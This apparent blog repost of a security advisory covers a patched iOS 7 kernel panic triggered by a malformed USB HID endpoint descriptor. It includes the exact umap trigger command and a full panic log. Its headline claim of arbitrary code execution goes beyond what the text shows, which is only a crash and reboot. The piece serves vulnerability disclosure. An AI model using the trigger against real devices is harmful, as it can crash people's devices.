Translate

Flaw in iOS 7 allowed Arbitrary Code Execution in kernel mode causing the iPhone to reboot , Apple issues a fix

20:44 Vijay Prabhu 0 Comments
When all eyes are on the future launch of iOS 8, a security researcher has found a high risk flaw in the current operating system running on the iPhone, iPad and iPod Touch devices. According to the Proof of Concept submitted by security researcher Andy Davis, he has found out a flaw in  iOS 7 which enables high risk arbitrary code execution in kernel mode.  Once this code is executed, the iOS device kernel panics and reboots.
Flaw in iOS 7 allowed Arbitrary Code Execution in kernel mode causing the iPhone to reboot , Apple issues a fix

Andy had submitted the proof of concept to Apple Inc on 26th September, 2013 and finally on 10th March, 2014, Apple came out with a patch to mitigate this flaw.  The entire code is available at Github.  A brief details about the execution is given below :

Vulnerability Description 
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

When a specific value is supplied in USB Endpoint descriptor for a HID device 
the Apple device kernel panics and reboots

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

The bug can be triggered using umap (https://github.com/nccgroup/umap)
as follows:

sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

bMaxPacketSize = 0xff

Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951
CrashReporter Key: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b
Hardware Model: iPhone3,1
Date/Time: 2013-09-26 12:35:46.892 +0100
OS Version: iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1, 
fault_addr=0x28
r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe
r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78
r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001
r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8
cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

Debugger message: panic
OS version: 11A465
Kernel version: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013; 
root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X
iBoot version: iBoot-1940.1.75
secure boot?: YES
Paniclog version: 1
Kernel slide: 0x0000000008200000
Kernel text base: 0x88201000
Epoch Time: sec usec
Boot : 0x52441b69 0x00000000
Sleep : 0x00000000 0x00000000
Wake : 0x00000000 0x00000000
Calendar: 0x52441bb5 0x00056497

Panicked task 0x896f8d48: 12856 pages, 114 threads: pid 0: kernel_task
panicked thread: 0x8023de90, backtrace: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000

Apple has given this flaw Reference No. 600217059 and has released a patch to mitigate the vulnerability and can be downloaded here.  

Resource : CXSECURITY

No comments:

Post a Comment